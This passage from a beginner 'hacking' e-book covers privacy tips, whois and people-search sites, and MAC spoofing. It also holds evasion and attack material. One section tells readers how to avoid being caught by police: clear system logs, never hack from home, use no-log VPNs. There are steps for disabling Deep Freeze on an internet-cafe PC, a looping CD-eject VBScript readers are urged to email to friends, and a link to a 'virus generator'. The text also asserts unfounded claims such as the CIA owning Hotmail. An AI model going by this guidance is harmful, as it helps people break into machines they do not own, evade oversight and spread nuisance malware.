Level: Beginner

Penultimate Hackers
Ultimate hacking guide for beginners
Shubham Halle
TEAM IHA +
HackingTruth
H
a
c
k
i
n
g

T
r
u
t
h


INTRODUCTION
By Shubham Halle

The main objective of this e-book is to make yourself more secure!
Unless and until you know How you will be hacked? you wont be able to
secure yourself!
This is my first e-book on computer technology. I have included as many as stuff
possible into this book which a beginner will find useful.
Though all info shared in this e-book is actually a collection of very good blogs,
post, video tutorials etc. (Though it doesnt belong to me entirely)

Hope you all enjoy this book and share it!
Let me know if there are any suggestions and reviews from your side!













Shubham Halle
Facebook : http://www.facebook.com/halleshubham
Blog : http://www.hackingtruth.org
H
a
c
k
i
n
g

T
r
u
t
h
Eathen Hunt
https://www.facebook.com/AkkaProgrammer

LEGAL DISCLAIMER

Any proceedings and or activities related to the material contained within this
volume are exclusively your liability. The misuse and mistreat of the information in
this book can consequence in unlawful charges brought against the persons in
question. The authors and review analyzers will not be held responsible in the event
any unlawful charges brought against any individuals by misusing the information in
this book to break the law. This book contains material and resources that can be
potentially destructive or dangerous. If you do not fully comprehend something on
this book, dont study this book.
Please refer to the laws and acts of your state/region/province/zone/territory or
country before accessing, using, or in any other way utilizing these resources.
These materials and resources are for educational and research purposes only. Do
not attempt to violate the law with anything enclosed here within. If this is your
intention, then leave now. Neither writer of this book, reviewers, the publisher, nor
anyone else affiliated in any way, is going to admit any responsibility for
Your proceedings, actions or trials.


2
H
a
c
k
i
n
g

T
r
u
t
h

ACKNOWLEDGEMENT
For any successf ul wor k, i t owes t o t hank many




For any successful work, it owes to thank many


















3
H
a
c
k
i
n
g

T
r
u
t
h

TABLE OF CONTENTS
A. Introduction :
a. Where and how to start .7
1. Using a computer (Linux, configuration and so on).. 7
2. Networking (Protocols and how does everything work).. 8
3. Software (Developing and Reversing) 8
4. Hardware (How does your CPU work and so on).. 9
b. Using this book.10
c. Become a PARANOID11
1. History HACKERS....11
2. Some Basics about websites.....12
3. Everybody knows you ANNONIMITY....13
B. Protect yourself (famous and basic attacks).. 19
C. Anonymity
a. What is anonymity? ...................................................................... 21
b. Methods :
1. Using Virtual Private Network [VPN].... 22
2. Using SOCKS and HTTP proxy..22
3. MAC address spoofing.23
4. Hide your MAC address without any software.24
D. Secure your HACKING
a. How hackers get caught? .................................................................. 26
b. Hiding yourself as HACKER26
i. Clearing system logs.26
E. Facebook and other tricks!
a. Forgot to logout facebook account from others computers?................27
b. Create fake facebook conversation!....................................................28
c. Online chat trick!..................................................................................29
d. How to type symbols with keyboard..30
e. How to remove Deep Freeze Without any Software..31
f. Funny virus that continueously opens CD drive..32
g. Delmes batchfile virus generator..34
h. Compress 1GB data into 10MB.35
i. Change pen drive icon.35
j. Keep your laptop turned on while lid is closed.36
k. Access restricted websites from college computers...37
l. Block enemys SIM card..40
m. Changing icons..41
n. Things that Microsoft couldnt explain43
4
H
a
c
k
i
n
g

T
r
u
t
h

o. How to make flip 3D icon in taskbar..45
p. Lock files using recycle bin.46
q. Set a video as your desktop background.47
F. Generalized account hacking
a. Phishing.48
b. Key logging....51
c. Tab napping..58
d. Cookie stealing.....61
e. Bypass windows 7, XP and vista password screens..66
G. Legendary DDOS
a. What is DDOS attack? ........................................................................67
b. DDOS attack basic...68
c. Manual DDOS attack...71
d. DDOS attack by LOIC..71
e. DDOS attack by J ANIDOS..72
H. Beginning with a penetration testing platforms..73
a. About..74
b. Installation..75
i. Backtrack
1. Plain Install....76
2. Dual Boot...80
ii. Kali Linux
1. Plain Install86
2. Dual Boot...93
iii. Make one for you!......................................................................108
c. First things you must do.113
d. Basic Linux commands.....116
e. Exploiting remote pc (easy level).132
f. Social Engineering toolkit..140
g. Wireless hacking
i. WPE...141
ii. WPA/WPA 2.149
h. Metasploit tutorials by Shehab Imam .155
i. Metasploit Introduction...155
ii. Information Gathering Tool Nmap.....156
iii. Information Gathering Tool Nessus...157
iv. Exploitation ...158
v. Creating An Executable Payload..159
vi. MeterPreter ..161
vii. DNS Spoofing...163
5
H
a
c
k
i
n
g

T
r
u
t
h

viii. J ava Signed Applet.165
I. Website hacking .....166
a. Scanning website..167
i. Uniscan ...167
ii. Nmap.170
b. Hacking a joomla based website.182
c. Hacking a word press blog180
d. SQLi using Havij (smoothest hacking ever)175
e. XSS (cross site scripting)..184
f. Hack with basic html coding..188
g. Spaw vulnerability...189
h. Uploading your shell with tamper data ......191
i. Local File Inclusion Attack.192




6
H
a
c
k
i
n
g

T
r
u
t
h

INTRODUCTION

A lot of people ask How do I learn hacking?, Where do I start?, How do I
become a hacker and so on. I answered the question a million times. Now we all
can just give them this link to my blog. ^^This is my opinion about everything. Others
might think about it in a different way. Eat it or just throw it away.

WHAT IS HACKING?

Hacking is a hobby. There are many ways of hacking. Some breaksecurity
systems, some reverse code. In my opinion everything has to do with hacking. If you
want to become a hacker. You have to get some knowledge in computer science
and love to play around with it. Thats basicly everything a hacker needs Wink .

WHAT DO I HAVE TO LEARN?

This really depends on what you want to achieve. For example I want to learn
to break into systems with tools out there and i dont want to know a programming
language. For me you are no hacker then but then you just need to learn metasploit
and co. Wink
There are some main topics in my opinion that are important.
USING A COMPUTER

Most people, who read my blog, have this knowledge. If you dont I give you the
advice to install Linux and play around with it. Configure some Apache servers or
something like that. J ust play around till you feel comfortable with it. Compile some
programs and so on. If you are able to compile your Linux kernel and use it (maybe
with an optimized configuration for your pc). This topic should be done for you. You
dont need to know how to compile a kernel. J ust feeling comfortable with Linux should
proof you know how to use your computer Wink.
The other topics can be learned parallel. There is no need to focus on one topic.
7
H
a
c
k
i
n
g

T
r
u
t
h


NETWORKING
In my opinion everyone needs to know how to setup a network. Learn how to
calculate the subnet mask and co. This should be easy just read something about it.
Google helps alot here Wink .
Learn how everything works. Examples are ARP Protocol, TCP/IP Protocol and
how WLAN works. With this knowledge you can have alot of fun. You should be able
to MitM attack a router and pc with this. With this setup sniffing should be possible.
This is enough knowledge here in my opinion but depending on your needs you can
lern more. Google topics or interesting tools

pcap (for developers, if you want or know software development, this is
interesting for you)
arpspoof (dsniff package)
fragrouter (-B1 was it if i remember right to do forwarding so the network doesnt
break if you hook in there)
dsniff tools etc.

All tools you need here are on the net and knowing a network can be quite funny
on a LAN Party. Guys never really never ever login private pages on a lan party or
something like this. Public networks are public for a network hacker Wink .
SOFTWARE

Before learning reversing you have to learn software development. I
recommend every so called hacker to have at least a basic C knowledge. People
always ask what language do I have to learn. The question is obsolete. If you know
C, which is a functional language, very well and want to learn functional programming
in VB. The only thing that differs is the syntax. I read very often there are so many
differences and just a hand of people know assembler. This is just plain bullshit. I
know more than a hand of people that reverse code (which will be assembler). Wink
Other rumor I hear often from wannabe hackers. Are that you use absolute addresses
while developing assembler and the compiler creates relative addresses. Thats why
nearly no one knows assembler. That means knowing assembler needs basic addition
and subtraction. Yeah a assembler developer cant do that -.-.
8
H
a
c
k
i
n
g

T
r
u
t
h


I recommend to learn this languages in this order:
C (functional programming)
C++(Object oriented programming)
Assembler (Low level programming)

ASSEMBLER
The masterpiece, I know no-one who really develops software with it. Except he
is forced to. Knowing this language gives you the following advantages:
HARDWARE
You should know how a cpu works and how to read/write a circuit by a binary
table or formula. This is the basic, which i know. If you want to go deeper in this topic.
Microcontroller and/or FPGAs should be your topic. Learning this topic can be
expensive. I recommend you to learn the Software part next or better before this topic.
Going deep into hardware engineering needs software.

Conclusions:

There is no way to give you a numbered list what todo/learn to be a hacker.
Hacker just means that you know computer science and want to do experiments with
this knowledge. If I had to start from the beginning i would do it this way.
Install Linux and play around with it
Setup my network in linux so I got internet Very Happy
Learn C/C++with a book and all its examples
Go to a LAN party or hotspot and play around with the networking tools (dont
do bad things, if you sniff a password be happy, you made it. Dont use it for
bad things! You want to be a hacker not a cracker)
Play around with some hardware and develop software

Now some years should be gone and you should have the knowledge to go
alone from here on.

9
H
a
c
k
i
n
g

T
r
u
t
h

I hope this helps some people to make the right decisions. How to start
This e-book will serve a purpose of a beginners handbook for starting his
hacking!
USING THIS BOOK

1. As The main objective of this e-book is to make yourself more secure! You
can use this book to make yourself more secure or also to make others aware
of their security!

2. This book may contain information that can be used for illegal purposes,
but I myself tell you that this may lead you to go J AIL and instead of learning
the things you will waste your time in J AIL.

3. So, to avoid such things I have provided a sided information about testing
a trick or a hack!














10
H
a
c
k
i
n
g

T
r
u
t
h

INTRODUCTION
BECOME A PARANOID

Here Im giving out some information which will help you get more things in few
seconds

1) HISTORY - HACKERS

I will explain briefly on the type of hackers that there are out there for the sake
of academical knowledge. These descriptions are not in dept, instead they are meant
to slightly touch the subject and educate those are who are unaware of these titles on
the cyber world.
I. BLACK HAT HACKERS
- These are the most infamous hackers there are. These are the guys you hear
about it on the news due to committing crimes. These people are whose purpose is
to gain information and use for their own need. They could be anyone.
-Black Hats tend to be professionals at what they do and are extremely well
informed on everything related with the cyber world and crimes.
-Black Hats tend to be educated people who have worked many years to
accumulate all the knowledge they hold. They are not your kid who uses "hacking
tools" to scare their gaming buddies online.
-Black Hats is the image typically portrayed on movies.







11
H
a
c
k
i
n
g

T
r
u
t
h

II. WHITE HAT HACKERS

These are the lesser known hackers simply because they do the clean up
work that goes behind the scenes cleaning up the messes from Black Hat Hackers.
-White Hats are the heroes of the cyber world. They fight crime using their
hacking knowledge to patch exploits on system and assure that your information does
not gets leaked out or easily acquired by any Black Hats.
-White Hats are professionals at what they do. They have as much knowledge
as Black Hats, but use their skills to fight crime rather than aid it.

III. GRAY HAT HACKERS

-These are the somewhat known hackers simply because they are
unpredictable on what their actions might turn into. They are known as "Gray Hats"
because it's a mixture between the color White +Black =Creating: Gray
-Gray Hats are essentially neutrals on what they do. They might decide to do
what's right even if there's some other entity telling them that it's wrong or could be
vice versa.
For example, Black Hat steals bank information and leaks out on the internet.
Gray Hat could either decide to either use the information OR let the owners,
authorities, or the companies know of the exposure.

2) Website owners
Websites, there are millions of them around the world in all languages. You can
keep yourself entertained on them or you can become smarter reading potential useful
information as you are reading now.
Do you ever wonder "Who owns this website?" or "How can I find out who owns
it?"
I decided to include this topic on here since more and more people decide to
pay for hosting services to have their very own website for either personal usage or
some sort of business.

12
H
a
c
k
i
n
g

T
r
u
t
h

Well, unlike in the real world where you fill out papers and they get stacked or
hidden in some compartment where not a random person could have access.
Websites expose your information unknowingly. Maybe not the websites themselves,
but the companies that provide hosting services.
I will use this website "HackForums.net" as an example to teach what I'm talking
about.
There is something known as a "whois" that essentially tells you who registered
the domain name.
You can easily Google "whois domain" and a huge list of websites that allow
you to whois either a location or a domain to find its location.
My favorite website to do whois is: http://whois.domaintools.com/
Now, if we do a whois on HackForums.net, here's what we get.
Quote:
Domain Name: HACKFORUMS.NET
Registrar: MONIKER
Registrant [2341726]: Moniker Privacy Services Moniker Privacy Services
20 SW 27th Ave., Suite 201, Pompano Beach, FL 33069, US
Administrative Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155
Billing Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155

Technical Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155

Domain servers in listed order:
13
H
a
c
k
i
n
g

T
r
u
t
h

NS1.DALLAS-IDC.COM
NS2.DALLAS-IDC.COM
NS1.ZANMO.COM 69.162.82.250
Record created on: 2005-09-27 14:18:41.0
Database last updated on: 2010-11-29 02:16:59.78
Domain Expires on: 2011-09-27 14:18:41.0

As you can see it exposes a lot of information that you wouldn't want strangers
to get a hold of you and then use to sell for their own good.
Common Hacking Forums, Websites are registered as a "Private" domain, so
no real information is shown of the real owner. Instead, it displays the information of
the company providing the service for the domain or hosting.
This is also how you can contact a company if you want to report a website with
disgusting content such as child pornography.
I'm not going to WHOIS a person's website since it would be against the rules
to expose personal information about anyone, but I believe that you get the idea of
what can be done to discover information such as address, name, phone number, fax
number, and more using nothing but a website name.
Experienced website administrators always should use Private domains to
avoid exposing information to the public as much as possible.If you have a website,
whois it yourself and find out whether if you are exposed or not.If you are, call the
company you registered your domain and request your domain to be put as private.
They might require a fee of around $7 extra a year, but it's worth it knowing that you're
not exposed.

YOU COULD ALSO FIND OUT THE ISP OR COMPANY BY DOING A PING ON AN IP.

Example,
Open Command Prompt and type "ping Hackforums.net" the response will be an IP.
Once you have that IP, you can use:
http://iplocation.net/
14
H
a
c
k
i
n
g

T
r
u
t
h

To tell you where the servers are located and giving you a definite location for
the company's machines.
http://iplocation.net/ Can also be used to find the location of a person's location
with their IP.

EVERYBODY KNOWS YOU!
*YOUR NAME
Your name is as unique as you can be. Your parents/guardians named you and
that's what makes you, is you. Your name can be your worst enemy when you are
online as it can be used to expose so much information about you to the point of where
you could be blackmailed. Where should you ever use your real name online?
NEVER. Why? Because, using your name alone anyone can find out where you live
within a matter of 5 seconds.
Websites such as:
http://com.lullar.com/
http://www.pipl.com/email/
http://www.spokeo.com/
http://www.emailfinder.com/
http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
15
H
a
c
k
i
n
g

T
r
u
t
h

http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/
http://www.whitepages.com/
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com/
http://www.zabasearch.com/
http://www.zoominfo.com/

Make it extremely easy to search names, e-mails, etc. to dig information about
whoever you want. There are more websites in which I personally use to dig
information about people, but I will not mention them since I do not want the news
station going crazy on a new rage of identity exposers.

* YOUR E-MAIL

Your e-mail, the one you use to check on your everyday business or activities
online. The one you rely to deliver things to you safely.
Question is, are you delivering to it safely? Probably not, or at least I hope you
are.
The e-mail problem is an easy fix since all it takes is common sense. If you have
various accounts such as Social networks, have an e-mail specifically for messing
around. If you have accounts for serious business such as your Paypal, Bank, etc...
Have an e-mail that only you have access to and is different from your regular
"messing around" e-mail. If you work for any companies or have services with an ISP,
avoid using their e-mail services to register on important websites where your money
is dealt with such as Paypal, AlertMoney, banks, etc...
Why?
16
H
a
c
k
i
n
g

T
r
u
t
h

Because they have been known to get hacked leaving all your information
exposed for hackers to gorge in. Instead, I would recommend focusing on big
companies such as Yahoo, Hotmail, or Gmail since these are much more secured
companies and will always be up 24/7 any time of the year.
Not much to say on that, just have different e-mails for different activities for
security measures. Not only that, but also have different passwords that require
extensive typing with various complicating symbols such as:
you%(3cool
That above is a ridiculous example, but I believe you get the idea.
You know what hackers love the most? Not having to do much work and having
everything set for them easily for the taking. For example, if you are infected with a
KEYLOGGER, a hacker would love to have 1 e-mail to have access to everything.
So, this gives you an idea why you should have a variety at all times with up-to-date
information to assure that you could retrieve it, in case if it were to get stolen.

* WHAT YOU SIGN UP TO

Ever wondered why you get so much spam e-mails? Well, it's simple. It's
because e-mail collectors acquire a list of e-mails in which they can mass e-mail to
send spam. J ust as I mentioned earlier, have an e-mail for messing around and e-
mails for serious business. Avoid using an e-mail for all activities as this will only clog
your inbox with useless e-mails that will steal your valuable time. There are many
websites which sell their database of e-mails to E-mail spammers for a certain amount
of money behind the scenes or the collectors themselves have set traps through the
internet such as Phishing to acquire a list of e-mails to spam.
Avoid registering to websites such as products and random useless subjects
that promise to pay you money for signing up or trying their products.
Seems to me like it's common sense, but it's good to know.




17
H
a
c
k
i
n
g

T
r
u
t
h

* INFORMATION YOU EXPOSE UNKNOWINGLY

Well, I hope that I have given you a good idea of easily information can be
acquired using the internet. Privacy does not exists anymore on the internet. If you
use Social Networks, try to have your information concealed as much as possible
from the public and do not expose valuable information such as Birthday, location, or
name to keep yourself as underground as possible.
You have to consider that information could be leaked physically or
electronically as well.
Keep yourself up-to-date and informed to know if a company you might use has
been breached or not.
Here As they say, Google is your friend. Use it when you need it.

















18
H
a
c
k
i
n
g

T
r
u
t
h

HOW CAN YOU PROTECT YOURSELF?

KEEPING YOU SAFE

This is probably the most important part of the tutorial as this is where the most
incidents occur due to infections or traps.
Infections or traps can range from:
-RATs (Remote Access Tool) which essentially give completely control of your
computer.
-Keylogging which retains a log of all the keys you ever press on your keyboard.
-Phishing which retains a log when you manually input your information on a
fake website emulating an original website.
-And more, but those above are the most common.

Around 90% of malware on the internet was coded to infect Windows Operating
systems. I got that number from PC World about a year ago, forgive me if it's incorrect
now. Anyway, assuming that you run on Windows you are the ones are the highest
risk of getting targeted or infected.
You will want to always have your computer clean and secured having the
proper tools. All these tools are the best of the best and are all free. They are probably
better than paid security software.
How do I know this? Well, there are websites where you can scan malware after
you crypt them (making them undetectable) to ensure that they are not detected by
Anti-virus of any kind. Avira is the one that people always have a hard time bypassing,
so I can safely say that it's the best from my personal experience of crypting and
scanning.
Download and install all these tools below and I can assure you that your
computer will be protected 1000% better than what it might be as of now. Get the free
versions.
1.http://www.malwarebytes.org/
2.http://personalfirewall.comodo.com/
19
H
a
c
k
i
n
g

T
r
u
t
h

3.KeyScrambler Pro 2.7 - Follow the instructions on that link on how to get it for
free. This software helps to encrypt everything you type on the internet.
4.If you use Firefox, get this:
http://www.eff.org/https-everywhere
It encrypts all your website visits as https:// rather than http:// which makes you
more secured as well.
5. FireShepherd,
A small console program that floods the nearby wireless network with packets
designed to turn off FireSheep, effectively shutting down nearby FireSheep programs
every 0.5 sec or so, making you and the people around you secure from most people
using FireSheep. http://notendur.hi.is/~gas15/FireShepherd/
The program kills the current version of FireSheep running nearby, but the user
is still in danger of all other session hijacking mechanisms. Do not do anything over a
untrusted network that you cannot share with everyone.
-Know that this is only a temporary solution to the FireSheep problem, created
to give people the chance to secure themselves and the others around them from the
current threat, while the security vulnerabilities revealed by FireSheep are being fixed.
The other option is using a different operating system which has a lower
percentage of being targeted. You don't have to spend tons of money on Apple
computers, instead you can get a free operating system from the Linux distributions.
The easiest to use and most similar to Windows looks is Ubuntu. You can install
Ubuntu as a normal program on Windows and once it restarts, it shows you the option
to choose Ubuntu over Windows.







20
H
a
c
k
i
n
g

T
r
u
t
h

ANONYMITY
WHAT IS ANONYMITY ??

The act of keeping your identity hidden online by using connection methods and
encryption methods, to make yourself untraceable to a person, website, company,
school or whatever else you are doing/connecting to.

USES OF ANONYMITY:

I. Stay hidden when attacking a website or scanning it for vulnerabilities.
II. Keep your browsing history/activity hidden when at work, school, library or
even your family computer.
III. Keep your IP (Internet Protocol Address) hidden from victims of a RAT
(Remote Administration Tool) or a botnet.











21
H
a
c
k
i
n
g

T
r
u
t
h

METHODS

I. Using Virtual Private Network[VPN]
A VPN is an acronym for Virtual Private Network, it is a server that is used to
connect to a LAN (Local Area Network) securely. VPNs will encrypt your connection
information and hide your real IP from websites, people and it will keep your
connection encrypted so you won't be able to get traced.
List of good Free VPNs: (google these out !)
Cyberghost VPN
Pro XPN
Open VPN
Hot Spot Shield

II. Using SOCKS and HTTP Proxy

WHAT IS SOCKS 4/5 ?

SOCKS is the internet protocol that makes it easier for packets to be routed
between the client/server via a proxy server. The SOCKS protocol has a designated
port, but is not limited to that port. This port number is 1080.
Socks will let you get by the network firewall, usually with schools or workplaces,
they will have a block on the browsing you are allowed to do.

WHAT IS HTTP PROXY ?

A HTTP ( Hypertext Transfer Protocol ) proxy is kind of the same thing as a
SOCKS 5, except the fact it using the HTTP protocol instead of the SOCKS protocol.
When a browser is configured with a HTTP proxy, it just hooks through the proxy
server and bypasses any firewall put in place on the LAN ( Local Area Network )


22
H
a
c
k
i
n
g

T
r
u
t
h


WEB PROXIES AND PROXY CLIENT/ MANAGERS

Proxy Filter
Hide my ass
Proxify

MAC ADDRESS AND MAC ADDRESS SPOOFING
MAC address is the acronym for Media Access Control address it's the unique
identifier for a network interface. I like to think of it as the fingerprint of your connection.
MAC address spoofing is using a program (You can do it manually but program
is much easier.) to change your MAC address so it doesn't leave behind your networks
"fingerprint." Without doing this, you will never be FULLY anonymous.
MAC ADDRESS SPOOFERS [TOOLS]

SMAC
NMAP












23
H
a
c
k
i
n
g

T
r
u
t
h

WITHOUT ANY SOFTWARE (HIDE MAC)
Most Of People Says That It is Not Possible to change MAC Address Without
Software...! So Here Im telling you a secret Easy and the Best Way to Change It...!
STEPS as follows:
Open Command Prompt (win+r>type-CMD>press Enter). Now Type "getmac"
It will Show You Current MAc Address. If You Like Can Write Down it on
Notepad or Anywhere.
After Knowing Your MAc Address J ump To Start>Control Panel>Network and
Internet>Network & Sharing Center>, Now Click On "Change Adapter Settings"
Which Is Found Top Left Corner.
After Being On "Change Adapter Settings" You Will See "Bluetooth Network
Connection","Wireless Network Connection","Local Area Connection" Right
Click On "Local Area Connection" . Click On "Configure" and J ump To "Advance
Tab". Go TO "Network Address". By Default It Will Be "not Present". You Need
TO OPT Value And Give The MAC Address Which You Want Don't Change
Much J ust Change 2 or 3 Digits. Click Ok And Wait till It Gets Redialed. And
Gets Connected.
Enjoy You Have Successfully Changed Your MAC Address. If You Like You
Can Check It By "GetMac" Which Way I Told YOu In First Step.
Note - With This Way You Can Change MAC Address Of Xp, vista,Win7 ,Win8.












24
H
a
c
k
i
n
g

T
r
u
t
h

SECURE YOUR HACKING

After learning this hacking stuff I dont think anybody is going to leave it! So, this
is the way which may do it! The tips given here are made in the way that it becomes
difficult for a cyber police to catch you! But its working will depend on you in which
way you have secured yourself !

1) HOW HACKERS GET CAUGHT.

First stuff that gives you away are "LOGS". You need to know how events,
application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions. Another giveaway is leaving a
:wq in /var/log/messages or binaris.
Your laziness will take you into problems. NEVER HACK FROM HOME!
Take your time, and go to net cafe or anywhere else apart from home.
Logs will take you down!
The code that you run on system will take you down. If you compile the
code on target, libraries will give you away!
If your victm, notice, that he is maybe hacked, or something is wrong.. He
will ask from his ISP for IP logs, and if you dont use VPN, or if you hack
from home, they will hunt you down.
Thing, that takes you down 100% is BRAGGING. It is common problem
of beginning hackers. They like to brag, to earn respect and reputation but
NOT KNOWING that is the matter of minutes, hours may be days when
they will be caught.
*Don't use HOTMAIL. CIA Owns it.






25
H
a
c
k
i
n
g

T
r
u
t
h

2) HIDING AND SECURING YOU AS "HACKER"

Temporary guest accounts, unrestricted proxy servers, buggy
Wingate servers, and anonymous accounts can keep hackers
carefree.
A young hacker is less likely to know all the little things that an expert
hacker might know. Besides, the young hacker may be trying to
impress others - and get a little careless about covering his tracks.
This is why younger hackers are often caught.
An older hacker, on the other hand, will rarely leave any tracks. They
know how to use their slave's computers as a tool for a launching
place to get into another computer.

There will always be hackers, and there will always be hackers in prison.
DESTROY LOGS, REMOVE ALL YOUR TRACKS!
DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!



HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start >Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select
Clear All Events.
To save the current system log, click Yes when Windows returns the message,
"Do you want to save 'System' before clearing it?", enter a file name for the
saved system log file, and then click Save.


I will recommend you to use paid VPN which keeps no logs.


26
H
a
c
k
i
n
g

T
r
u
t
h

FACEBOOK AND OTHER TRICKS!
Cur i osi t y of seeki ng i nt o ot her s pr of i l e makes many guys hacker .

The most curious reason for of course many of peoples for turning into a hacker,
a kiddie, a beginner! So, here we go for the stuff you wanted!
This part includes tricks-tips and Digito Social hacking methods!
Lets start with tricks!
FORGOT TO LOGOUT?
FORGOT TO LOGOUT FACEBOOK ACCOUNT IN CYBER?
Have you ever forgot to logout your facebook account from cyber? then you
might have seen the spams from your account. So here after no worry if you forgot to
logout from a computer to which you wont have access later to logout because by
this method you will be able to logout from any computer.
Log in to your account (from any where)
Go to Account Settings (located in the right side of Home)
Choose "Security" (You will see the below photo)
Go to Active Sessions (All of your Log-ins are listed their everywhere..)
Click End Activity and You will be Logged Out..











27
H
a
c
k
i
n
g

T
r
u
t
h

CREATE FAKE FACEBOOK CONVERSATION
Want to make fun with your friends by creating fake conversation? Here we go!
Go to http://fakeconvos.com/ and login with your Facebook account.
Hit on Create in top header bar to see
Enter the Name of commenter. For image, hit on Browse and you will see a new
panel for selecting image. You can use their image library or the best way is to
use Google to search for image of your specific person. Images will be cropped
automatically to suit the profile.
Enter the comment and hit on Add to Stream. To add a new comment, follow
the same procedure.
Once you are done with creating the fake conversation, hit on Save it. To
publish it on your Facebook profile, check Auto publish to Facebook. You can
even take a snapshot and share it on Facebook.
Using this Fakeconvos, you can easily create funny conversations and get lots
of likes.















28
H
a
c
k
i
n
g

T
r
u
t
h

ONLINE CHAT TRICKS:-

J ust type the following codes
Troll face: [[171108522930776]]
ARE YOU FUCKING KIDDING ME: [[143220739082110]]
Not bad Obama: [[169919399735055]]
Me Gusta: [[211782832186415]]
Mother of God: [[142670085793927]]
Cereal Guy: [[170815706323196]]
LOL Face: [[168456309878025]]
NO Guy: [[167359756658519]]
Yao Ming: [[218595638164996]]
Derp: [[224812970902314]]
Derpina: [[192644604154319]]
Forever Alone: [[177903015598419]]
Not Bad: [[NotBaad]]
Fuck yeah: [[105387672833401]]
Challenge accepted: [[100002727365206]]
Okay face: [[100002752520227]]
Dumb bitch: [[218595638164996]]
Poker face: [[129627277060203]]
Okay face: [[224812970902314]]
Socially awkward penguin: [[98438140742]]
Rage face: [[FUUUOFFICIAL]]
Lamp: [[100001256102462]]
No: [[167359756658519]]
MOG: [[142670085793927]]
Feel like a sir: [[168040846586189]]
Forever alone christmas: [[125038607580286]]
NOTE:- You have to type [[ ]] also either it can't work






29
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO TYPE SYMBOLS WITH KEYBOARD

Alt +0153..... ... trademark symbol
Alt +0169.... .... copyright symbol
Alt +0174..... ....registered trademark symbol
Alt +0176 .........degree symbol
Alt +0177 .......plus-or -minus sign
Alt +0182 ........paragraph mark
Alt +0190 .......fraction, three-fourths
Alt +0215 .........multi plication sign
Alt +0162.......the cent sign
Alt +0161.......... .upside down exclamation point
Alt +0191.......... upside down question mark
Alt +1...........smiley face
Alt + 2 ...........black smiley face
Alt + 15..........sun
Alt + 12...........female sign
Alt + 11...........male sign
Alt + 6............spade
Alt + 5............. Club
Alt + 3............. Heart
Alt + 4............. Diamond
Alt + 13...........eighth note
Alt + 14............ beamed eighth note
Alt + 8721.... .... N-arysummation (auto sum)
Alt +251..........square root checkmark
Alt + 8236.......... infinity
Alt + 24............ up arrow
Alt + 25............ down arrow
Alt + 26..........right arrow
Alt + 27...........left arrow
Alt + 18...........up/down arrow
Alt + 29.........lef t right arrow




30
H
a
c
k
i
n
g

T
r
u
t
h


HOW TO REMOVE DEEP FREEZE WITHOUT ANY SOFTWARE.

You can uninstall deep freeze without using any programs or bootble disc to
delete the driver and keys. Here's what I did when I hack a windows xp in an internet
cafe. You should be quick to do this or else failure.

1. J ust goto bios setup and change the date 3 years backward from now because
deep freeze doesn't exist that year save it and restart your computer.
2. After restarting your computer press F8 to select the boot option. Select Windows
Debugging mode.
3. When the welcome screen appear be ready place your finger at the CTRL +ALT +
DEL or shortcut key to task manager.
4. When desktop appear hit the three keys quickly. The windows task manager should
appear when you hit CTRL +ALT +DEL.
5. Quickly kill this process DF5Serv.Exe press DEL to kill this process. If the process
DF5Serv.Exe it's done.
6. Restart your computer and change the date to present date. Then boot up your
computer. There you can see the deep freeze task icon mark as X means it is disable.
Use deep freeze installer to uninstall deep freeze and install it again if you like.
Enjoy!


31
H
a
c
k
i
n
g

T
r
u
t
h


CREATE A FUNNY VIRUS THAT CONTINUOUSLY EJ ECT CD/DVD DRIVES:

Step 1: Open Notepad and copy the below given code in it

Set oWMP =CreateObject("WMPlayer.OCX.7")
Set colCDROMs =oWMP.cdromCollection
do
if colCDROMs.Count>=1 then
For i =0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
Next
For i =0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Step 2: Save it as eject.vbs in any location
You can use any name but it should have .vbs extension.
Make sure that the "All Files" option is selected in the "Save as type" is drop-down
list.
Step 3: Open your saved file.
It will continuously eject all your connected Optical drives!!!
If you put them back in, it will pop them out again. :P :P
To stop this program,
32
H
a
c
k
i
n
g

T
r
u
t
h

End the wscript.exe process in the Task Manager.
Or
Restart your computer.
Send this file to your friends as an email attachment and have fun :P ;)
DO NOT WORRY... IT IS COMPLETELY HARMLESS!!!



33
H
a
c
k
i
n
g

T
r
u
t
h

COMPRESS 1GB DATA INTO 10MB
KGB archiver is the compression tool that makes that happen.

Pros: -
Very high compression power with very accurate result and no loss of data.

Cons: -
Due to high compression rate, the time requires to compress and decompress the file
is high.

Download Link - www.sourceforge.net/projects/kgbarchiver

34
H
a
c
k
i
n
g

T
r
u
t
h




DELMES VIRUS CREATOR
Its a batchfile virus generator which generates viruses which carry out funny
actions on PC.
Download it from here: http://adfoc.us/10187330741865

HOW TO CHANGE THE ICON OF YOUR PEN DRIVE

download the ICON & Go to Notepad and type
[autorun]
icon=(icon name).ico
without ( )

Then save it in your pen drive and name it autorun.inf

NOTE: Icon & autorun.inf file should have in your pen drive either it cannot works then
hide both file. Then unplug the pen drive again insert the pen drive your pen drive icon
changed.











35
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO KEEP YOUR LAPTOP TURNED ON WHILE ITS LID IS CLOSED.

1) First, you need to open local group policy editor. (To open Local Group Policy
Editor: Open Run [Windows key+R]. Then type: Gpedit.msc
2) Now go to Administrative Templates. (Its right there. J ust under the heading Local
Computer Policy.)
3) When you go to Administrative Templates, you will see some options. Choose All
settings from the options (In my laptop, its the last option)
